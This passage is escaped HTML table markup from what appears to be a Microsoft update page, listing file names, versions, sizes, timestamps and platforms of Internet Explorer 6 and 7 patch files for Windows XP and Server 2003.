class=\"sbody-td\">14:59</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wbrowseui.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">1,033,728</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wdxtmsft.dll</td><td class=\"sbody-td\">6.3.3790.5294</td><td class=\"sbody-td\">361,472</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wdxtrans.dll</td><td class=\"sbody-td\">6.3.3790.5294</td><td class=\"sbody-td\">209,920</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Whtml.iec</td><td class=\"sbody-td\">2011.1.31.10</td><td class=\"sbody-td\">369,664</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieencode.dll</td><td class=\"sbody-td\">2011.1.31.10</td><td class=\"sbody-td\">82,432</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiepeers.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">253,952</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmshtml.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">3,164,160</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmshtmled.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">459,264</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmstime.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">537,600</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wpngfilt.dll</td><td class=\"sbody-td\">5.2.3790.5294</td><td class=\"sbody-td\">42,496</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wshdocvw.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">1,520,128</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wtdc.ocx</td><td class=\"sbody-td\">1.3.0.3131</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wurl.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">37,888</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wurlmon.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">713,216</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wvgx.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">854,016</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ww03a3409.dll</td><td class=\"sbody-td\">5.2.3790.5294</td><td class=\"sbody-td\">46,080</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wwininet.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">672,256</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">14:59</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr></table></div><h4 class=\"sbody-h4\">Internet Explorer 6 on all supported x64-based versions of Windows Server 2003 and Windows XP Professional</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Spuninst.exe</td><td class=\"sbody-td\">6.3.4.1</td><td class=\"sbody-td\">293,168</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:03</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">None</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Browseui.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">1,605,120</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtmsft.dll</td><td class=\"sbody-td\">6.3.3790.5294</td><td class=\"sbody-td\">562,176</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtrans.dll</td><td class=\"sbody-td\">6.3.3790.5294</td><td class=\"sbody-td\">332,288</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2011.1.31.10</td><td class=\"sbody-td\">566,784</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieencode.dll</td><td class=\"sbody-td\">2011.1.31.10</td><td class=\"sbody-td\">96,256</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">370,176</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">6,067,712</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">930,816</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">900,608</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pngfilt.dll</td><td class=\"sbody-td\">5.2.3790.5294</td><td class=\"sbody-td\">64,000</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Shdocvw.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">2,460,672</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Tdc.ocx</td><td class=\"sbody-td\">1.3.0.3131</td><td class=\"sbody-td\">94,208</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">40,960</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">1,107,456</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">1,428,480</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">W03a3409.dll</td><td class=\"sbody-td\">5.2.3790.5294</td><td class=\"sbody-td\">46,592</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">1,196,544</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wbrowseui.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">1,033,728</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wdxtmsft.dll</td><td class=\"sbody-td\">6.3.3790.5294</td><td class=\"sbody-td\">361,472</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wdxtrans.dll</td><td class=\"sbody-td\">6.3.3790.5294</td><td class=\"sbody-td\">209,920</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Whtml.iec</td><td class=\"sbody-td\">2011.1.31.10</td><td class=\"sbody-td\">369,664</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieencode.dll</td><td class=\"sbody-td\">2011.1.31.10</td><td class=\"sbody-td\">82,432</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiepeers.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">253,952</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmshtml.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">3,164,160</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmshtmled.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">459,264</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmstime.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">537,600</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wpngfilt.dll</td><td class=\"sbody-td\">5.2.3790.5294</td><td class=\"sbody-td\">42,496</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wshdocvw.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">1,520,128</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wtdc.ocx</td><td class=\"sbody-td\">1.3.0.3131</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wurl.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">37,888</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wurlmon.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">713,216</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wvgx.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">854,016</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ww03a3409.dll</td><td class=\"sbody-td\">5.2.3790.5294</td><td class=\"sbody-td\">46,080</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wwininet.dll</td><td class=\"sbody-td\">6.0.3790.5294</td><td class=\"sbody-td\">672,256</td><td class=\"sbody-td\">04-Feb-2014</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr></table></div><h3 class=\"sbody-h3\">Internet Explorer 7</h3><h4 class=\"sbody-h4\">Internet Explorer 7 on all supported 32-bit versions of Windows XP</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Spuninst.exe</td><td class=\"sbody-td\">6.3.13.0</td><td class=\"sbody-td\">231,288</td><td class=\"sbody-td\">04-Sep-2013</td><td class=\"sbody-td\">11:28</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">None</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Advpack.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">124,928</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2007.0.0.21306</td><td class=\"sbody-td\">17,408</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtmsft.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">347,136</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Dxtrans.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">214,528</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Extmgr.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">132,608</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.21306</td><td class=\"sbody-td\">389,120</td><td class=\"sbody-td\">05-Feb-2014</td><td class=\"sbody-td\">23:53</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Icardie.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">63,488</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">70,656</td><td class=\"sbody-td\">05-Feb-2014</td><td class=\"sbody-td\">23:52</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieakeng.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">153,088</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieaksie.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">230,400</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieakui.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">161,792</td><td class=\"sbody-td\">02-Feb-2014</td><td class=\"sbody-td\">22:33</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">08-Mar-2012</td><td class=\"sbody-td\">18:41</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">380,928</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedkcs32.dll</td><td class=\"sbody-td\">17.0.6000.21371</td><td class=\"sbody-td\">388,608</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieencode.dll</td><td class=\"sbody-td\">2017.0.0.21306</td><td class=\"sbody-td\">78,336</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">6,108,672</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll.mui</td><td class=\"sbody-td\">7.0.6000.16414</td><td class=\"sbody-td\">991,232</td><td class=\"sbody-td\">08-Mar-2012</td><td class=\"sbody-td\">18:43</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iernonce.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">44,544</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">268,288</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieudinit.exe</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">13,824</td><td class=\"sbody-td\">05-Feb-2014</td><td class=\"sbody-td\">23:52</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">643,312</td><td class=\"sbody-td\">02-Feb-2014</td><td class=\"sbody-td\">22:34</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">1,830,912</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">Not Applicable</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">27,648</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">496,128</td><td class=\"sbody-td\">06-Feb-2014</td><td class=\"sbody-td\">05:07</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.dll</td><td class=\"sbody-td\">7.0.6000.21371</td><td class=\"sbody-td\">52,224</td><td class=\"sbody-td\">06-Feb-2014</td><td 